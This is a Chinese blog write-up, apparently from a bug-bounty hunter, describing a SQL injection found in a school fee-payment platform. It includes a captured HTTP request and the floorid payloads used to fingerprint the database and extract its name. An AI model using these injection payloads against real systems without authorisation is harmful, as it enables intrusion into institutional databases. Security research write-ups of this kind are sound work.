题外话
edu证书站的挖掘难度相比普通学校肯定相对难度大一点,所以最好是在证书上新的时候选择开挖。
作者也是通过打新证书站,拿下了好几本证书。
、
这个站首先他是一个缴费平台,是在登陆界面有注册接口的,我们注册一个账号进去看看是否有注入点。
POST /getRoomInfo HTTP/1.1Host:Cookie: JSESSIONID=33C233CD5DD4F10235EBD50D9062E052User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Accept: application/json, text/javascript, /; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 41Origin:Referer:Priority: u=0Te: trailersConnection: closebuildid=000024&floorid=1&factorycode=E035
发现这个数据包,注入点在floorid,注入类型为单引号闭合
floorid=1/0
floorid=1/1
之后就是判断数据库类型了
网站采用java开发,最常搭配sqlserver或者oracle
也可以直接通过函数判断,通过len函数判断,因为oracle中是没有len函数的。
floorid=1/**/len(12)=2
回显正常
直接跑数据库长度6位
数据库名payload:floorid=1//and//substring((select/**/db_name()),9,1)=char(83)
数据库名称成功注入成功
结语
欢迎各位师傅咨询挖洞思路
原文始发于微信公众号(扫地僧的茶饭日常):记一次edu证书站挖掘
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论